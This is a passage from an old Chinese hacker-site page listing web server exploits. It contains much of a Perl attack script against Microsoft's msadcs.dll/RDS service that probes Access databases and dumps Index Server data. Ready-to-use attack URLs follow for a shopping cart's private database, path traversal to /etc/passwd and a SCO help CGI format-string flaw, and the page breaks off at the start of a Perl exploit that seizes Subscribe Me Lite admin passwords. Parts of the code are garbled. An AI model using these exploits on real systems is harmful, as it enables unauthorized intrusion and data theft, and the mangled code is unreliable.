作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2004-11-7 ![]() |
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(3,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; # this is sparse, because I don't know of many my @sysmdbs=( "\catroot\icatalog.mdb", "\help\iishelp\iis\htm\tutorial\eecustmr.mdb", "\system32\certmdb.mdb", "\system32\certlog\certsrv.mdb" ); #these are %systemroot% my @mdbs=( "\cfusion\cfapps\cfappman\data\applications.mdb", "\cfusion\cfapps\forums\forums_.mdb", "\cfusion\cfapps\forums\data\forums.mdb", "\cfusion\cfapps\security\realm_.mdb", "\cfusion\cfapps\security\data\realm.mdb", "\cfusion\database\cfexamples.mdb", "\cfusion\database\cfsnippets.mdb", "\inetpub\iissamples\sdk\asp\database\authors.mdb", "\progra~1\common~1\system\msadc\samples\advworks.mdb", "\cfusion\brighttiger\database\cleam.mdb", "\cfusion\database\smpolicy.mdb", "\cfusion\databasecypress.mdb", "\progra~1\ableco~1\ablecommerce\databases\acb2_main1.mdb", "\website\cgi-win\dbsample.mdb", "\perl\prk\bookexamples\modsamp\database\contact.mdb", "\perl\prk\bookexamples\utilsamp\data\access\prk.mdb" ); #these are just foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv . $drive . ":\" . $dir . $mdb)){ print "n" . $drive . ":\" . $dir . $mdb . 
" successfuln"; if(run_query($drv . $drive . ":\" . $dir . $mdb)){ print "Success!n"; save (4,4,$drive . ":\" . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next timen"; ]]} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv . $drive . $dir . $mdb)){ print "n" . $drive . $dir . $mdb . " successfuln"; if(run_query($drv . $drive . $dir . $mdb)){ print "Success!n"; save (4,4,$drive . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next timen"; ]] } ############################################################################## sub hork_idx { print "nAttempting to dump Index Server tables...n"; print " NOTE: Sometimes this takes a while, other times it stallsnn"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \._]/n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \._n]//g; $results[$c]=~/([a-zA-Z]:\)([a-zA-Z0-9 _~\]+)\/; $d="";} foreach $c (keys %d){ print "$cn"; } } else {print "Index server doesn't seem to be installed.n"; ] ############################################################################## sub dsn_dict { open(IN, "<$args") || die("Can't open external dictionaryn"); while(<IN>){ $hold=$_; $hold=~s/[rn]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successfuln"; if(run_query("DSN=$dSn")){ print "Success!n"; save (3,3,"DSN=$dSn",""); exit; } else { print "Something's borked. Use verbose next timen";]} print "n"; close(IN);} ############################################################################## sub sendraw2 {# ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... 
my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problemsn"); if(connect(S,pack "SnA4x8",2,80,$target)){ print "Connected. Getting data"; open(OUT,">raw.out"); my @in; select(S); $|=1;print $pstr; while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...n"); ] ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { if($in[$c] =~/^x0dx0a/){ if ($in[$c+1]=~/^HTTP/1.[01] [12]00/) { $c++; } else { return $c+1; ]} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "nServer returned an ADO miscofiguration messagenAborting.n"; exit;} if($error=~/A Handler is required/){ print "nServer has custom handler filters (they most likely are patched)n"; exit;} if($error=~/specified Handler has denied Access/){ print "nServer has custom handler filters (they most likely are patched)n"; exit;] ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0nn"); my $base=content_start(@results); return 1 if($results[$base]=~/Content-Type: application/x-varg/); return 0;} ######################## 四十四. SmartWin CyberOffice Shopping Cart Smartwin Technology CyberOffice Shopping Cart是一种购物车应用程序,它被用在那些运行Windows NT 4.0或2000系统、允许进行电子商务交易的网站上。远程用户可能读取运行有Smartwin Technology CyberOffice Shopping Cart 2.0的网站的_private目录。默认情况下任何人对_private目录都有读权限。 攻击:http://target/_private/shopping_cart.mdb 四十五. 
Moreover.com CGI 文件泄露漏洞 新闻服务商Moreover.com 提供的catched_feed.cgi V1.0的脚本存在这样一个漏洞;这个脚本有获得文件 的功能,本来是用来返回一个指定文件的内容给浏览器,可是由于没有在用户输入的字符串中过滤".."字符串,所以通过构造一个URL,提交给这个脚本,可以获得CGI脚本不允许的文件内容,必须保证这个文件是HTTP用户可以读的; 攻击:http://victim/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd 四十六. Unixware SCOhelp CGI程序格式串漏洞 SCO Unixware 7 缺省安装时会包含sochelp组件。这是一个监听在tcp 457端口的HTTP服务器,允许用户访问帮助手册以及其他的一些文档。它的一个用来完成搜索功能的CGI程序存在一个格式串漏洞,允许远程用户在主机上执行任意代码。尽管攻击者只能得到'nobody'用户权限(缺省状态下),仍然会给用户非法访问主机系统的机会,他可能进一步获取更高权限。 攻击:http://target:457/search97cgi/vtopic?Action=FilterSearch&filter=&queryText=%25x 可以让服务器产生下列响应: -- Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query Builder): Invalid character '%' (0x25)) Result Search failed: -40 Result Error E1-0142 (Query Builder): Invalid character ' Result Error E1-0130 (Query Builder): Syntax error in query string near character 1 Result Error E1-0133 (Query Builder): Error parsing query: 81887e0 Result VdkSearchNew failed, error -40 Result Request failed for REQUEST_METHOD=, QUERY_STRING= Component Component (vsearch) failed in processing request, -2 Action Action (FilterSearch) failed while processing request in component (vsearch), -2 Service Manager Action (FilterSearch) failed in processing request, -2 S97IS Service manager failed to process request 四十七. Subscribe Me LITE 更改管理员口令漏洞 任何远程用户都能修改CGI Script Centers' Subscribe Me Lite的管理员口令。这使得远程用户拥有完全的管理权限,包括从邮件列表中增加和删除用户。 攻击: #!/usr/bin/perl -w ## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com ## This exploits changes the administrator password and ## let's anyone take over the mailing list. You can send ## bogus e-mail to everyone on the list. ## ## May work on earlier versions, but not sure - not sure ## if it will work on the Professional version either. ## ## teleh0r@doglover.com / anno 2000 ## httpd://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 2) { 上一页 [1] [2] [3] [4] [5] [6] 下一页 |